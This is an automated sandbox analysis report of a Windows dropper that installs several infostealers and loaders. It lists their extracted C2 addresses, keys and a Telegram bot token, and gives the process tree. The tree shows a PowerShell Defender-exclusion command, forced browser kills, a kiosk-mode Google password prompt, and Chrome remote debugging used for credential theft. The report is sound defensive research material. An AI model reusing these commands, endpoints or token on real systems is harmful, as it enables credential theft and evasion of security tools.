Overview

overview

10

Static

static

3

0cf46f77da...9a.exe

windows7-x64

10

0cf46f77da...9a.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 17:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe

  • Size

    1.8MB

  • MD5

    f7a071c71dd7454582afb12eb5f488ca

  • SHA1

    548af1bd92331df854dd8bd1d920601b9c7b4e96

  • SHA256

    0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a

  • SHA512

    491361ba6440c899756e1d486ea24c09d3c88fb9cd8d697a1bc88617fad522f297cdfce38d224bd6a0c3705b95ccb83eeee6216fd561332382286d448402af5c

  • SSDEEP

    24576:8batnOjZKIChJftECqSwAKyG7ljmZK4X1943gyQHfXFxQCCBzxCcSUpxs:8baaZmFZ/w1R+zU3zQHfXbQPRou7s

Score
10/10
amadeygcleanerhealerlitehttpphemedronestealcvidar092155ir7amtrumpbotcredential_accessdefense_evasiondiscoverydropperevasionexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot8073216408:AAGdXWcCmxBIngZx-Z502Gat9NRWpLvPTxU/sendDocument

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Vidar Stealer 15 IoCs
    stealer
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Phemedrone

    An information and wallet stealer written in C#.

    stealerphemedrone
  • Phemedrone family
    phemedrone
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
    defense_evasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Downloads MZ/PE file 19 IoCs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 35 IoCs
  • Identifies Wine through registry keys 2 TTPs 14 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 46 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 36 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe
    "C:\Users\Admin\AppData\Local\Temp\0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3928
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4560
      • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
        "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:556
        • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
          "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
          4⤵
          • Executes dropped EXE
          PID:836
        • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
          "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:916
          • C:\Users\Admin\AppData\Roaming\GxyBuhiuPy.exe
            "C:\Users\Admin\AppData\Roaming\GxyBuhiuPy.exe"
            5⤵
            • Executes dropped EXE
            PID:1160
          • C:\Users\Admin\AppData\Roaming\K6BpBnpw4G.exe
            "C:\Users\Admin\AppData\Roaming\K6BpBnpw4G.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2916
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 556 -s 812
          4⤵
          • Program crash
          PID:776
      • C:\Users\Admin\AppData\Local\Temp\10104850101\bc0c5e2a7a.exe
        "C:\Users\Admin\AppData\Local\Temp\10104850101\bc0c5e2a7a.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4476
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          PID:4640
      • C:\Users\Admin\AppData\Local\Temp\10104860101\67702a1bf1.exe
        "C:\Users\Admin\AppData\Local\Temp\10104860101\67702a1bf1.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1540
        • C:\Users\Admin\AppData\Local\Temp\10104860101\67702a1bf1.exe
          "C:\Users\Admin\AppData\Local\Temp\10104860101\67702a1bf1.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1916
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 812
          4⤵
          • Program crash
          PID:4280
      • C:\Users\Admin\AppData\Local\Temp\10104870101\5af08d2768.exe
        "C:\Users\Admin\AppData\Local\Temp\10104870101\5af08d2768.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2412
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          PID:976
      • C:\Users\Admin\AppData\Local\Temp\10104880101\a86ccbcd40.exe
        "C:\Users\Admin\AppData\Local\Temp\10104880101\a86ccbcd40.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2732
      • C:\Users\Admin\AppData\Local\Temp\10104890101\d4be487214.exe
        "C:\Users\Admin\AppData\Local\Temp\10104890101\d4be487214.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4636
      • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
        "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2968
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\uMj1oYSh\Anubis.exe""
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1592
      • C:\Users\Admin\AppData\Local\Temp\10104920101\ac32187dda.exe
        "C:\Users\Admin\AppData\Local\Temp\10104920101\ac32187dda.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Downloads MZ/PE file
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4932
        • C:\Users\Admin\AppData\Local\Temp\YWE5CS73BPDEWKLVXHLIY98RKVS2U76.exe
          "C:\Users\Admin\AppData\Local\Temp\YWE5CS73BPDEWKLVXHLIY98RKVS2U76.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2400
      • C:\Users\Admin\AppData\Local\Temp\10104930101\f7bb18bdf5.exe
        "C:\Users\Admin\AppData\Local\Temp\10104930101\f7bb18bdf5.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4796
      • C:\Users\Admin\AppData\Local\Temp\10104940101\70b73e7ec3.exe
        "C:\Users\Admin\AppData\Local\Temp\10104940101\70b73e7ec3.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:5044
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2740
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3844
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3644
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3048
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3604
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
            PID:4208
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
              5⤵
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:4796
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 27376 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {08a9ace6-7361-4be3-9dd3-5ff292581e5c} 4796 "\\.\pipe\gecko-crash-server-pipe.4796" gpu
                6⤵
                  PID:1192
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2460 -prefMapHandle 2392 -prefsLen 28296 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6de9a9a0-1c10-41f5-a6af-eead7df4e06f} 4796 "\\.\pipe\gecko-crash-server-pipe.4796" socket
                  6⤵
                    PID:932
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3224 -childID 1 -isForBrowser -prefsHandle 3208 -prefMapHandle 3308 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f56f33dd-1d83-4eff-834c-c32d0ec7b0fe} 4796 "\\.\pipe\gecko-crash-server-pipe.4796" tab
                    6⤵
                      PID:4376
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4048 -childID 2 -isForBrowser -prefsHandle 4040 -prefMapHandle 4036 -prefsLen 32786 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a61e1243-40ea-4e26-bdde-7bc3be789a62} 4796 "\\.\pipe\gecko-crash-server-pipe.4796" tab
                      6⤵
                        PID:4596
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4684 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4772 -prefMapHandle 4764 -prefsLen 32786 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4635a13b-e059-4a20-9ea1-e7fbca0cb36d} 4796 "\\.\pipe\gecko-crash-server-pipe.4796" utility
                        6⤵
                        • Checks processor information in registry
                        PID:5452
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5228 -childID 3 -isForBrowser -prefsHandle 5176 -prefMapHandle 5184 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e346b9cc-8519-496f-95bf-70a8df358024} 4796 "\\.\pipe\gecko-crash-server-pipe.4796" tab
                        6⤵
                          PID:6092
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5360 -childID 4 -isForBrowser -prefsHandle 5368 -prefMapHandle 5372 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b69867c9-327f-4b9b-a14c-d9694d6f04ed} 4796 "\\.\pipe\gecko-crash-server-pipe.4796" tab
                          6⤵
                            PID:6104
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5640 -childID 5 -isForBrowser -prefsHandle 5560 -prefMapHandle 5564 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99cfc799-4fb8-4ec2-ab8f-61953a79fd34} 4796 "\\.\pipe\gecko-crash-server-pipe.4796" tab
                            6⤵
                              PID:6116
                      • C:\Users\Admin\AppData\Local\Temp\10104950101\34724b190c.exe
                        "C:\Users\Admin\AppData\Local\Temp\10104950101\34724b190c.exe"
                        3⤵
                        • Modifies Windows Defender DisableAntiSpyware settings
                        • Modifies Windows Defender Real-time Protection settings
                        • Modifies Windows Defender TamperProtection settings
                        • Modifies Windows Defender notification settings
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Windows security modification
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5900
                      • C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe
                        "C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe"
                        3⤵
                        • Executes dropped EXE
                        PID:6064
                      • C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe
                        "C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:5260
                        • C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe
                          "C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:5408
                        • C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe
                          "C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"
                          4⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5424
                          • C:\Users\Admin\AppData\Roaming\HDS0C5I2EU.exe
                            "C:\Users\Admin\AppData\Roaming\HDS0C5I2EU.exe"
                            5⤵
                            • Executes dropped EXE
                            PID:6012
                          • C:\Users\Admin\AppData\Roaming\9i1h094ydr.exe
                            "C:\Users\Admin\AppData\Roaming\9i1h094ydr.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5556
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5260 -s 152
                          4⤵
                          • Program crash
                          PID:4408
                      • C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe
                        "C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:5660
                        • C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe
                          "C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:4552
                        • C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe
                          "C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"
                          4⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          PID:2348
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                            5⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            PID:1576
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeaf96cc40,0x7ffeaf96cc4c,0x7ffeaf96cc58
                              6⤵
                                PID:4100
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1976,i,8652103834837442443,3232033456825995708,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1972 /prefetch:2
                                6⤵
                                  PID:5636
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,8652103834837442443,3232033456825995708,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2164 /prefetch:3
                                  6⤵
                                    PID:2996
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,8652103834837442443,3232033456825995708,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2188 /prefetch:8
                                    6⤵
                                      PID:5808
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,8652103834837442443,3232033456825995708,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3188 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:940
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,8652103834837442443,3232033456825995708,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3228 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:2292
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,8652103834837442443,3232033456825995708,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4200 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:6028
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4496,i,8652103834837442443,3232033456825995708,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4048 /prefetch:8
                                      6⤵
                                        PID:3948
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,8652103834837442443,3232033456825995708,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4748 /prefetch:8
                                        6⤵
                                          PID:5480
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4684,i,8652103834837442443,3232033456825995708,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:8
                                          6⤵
                                            PID:2380
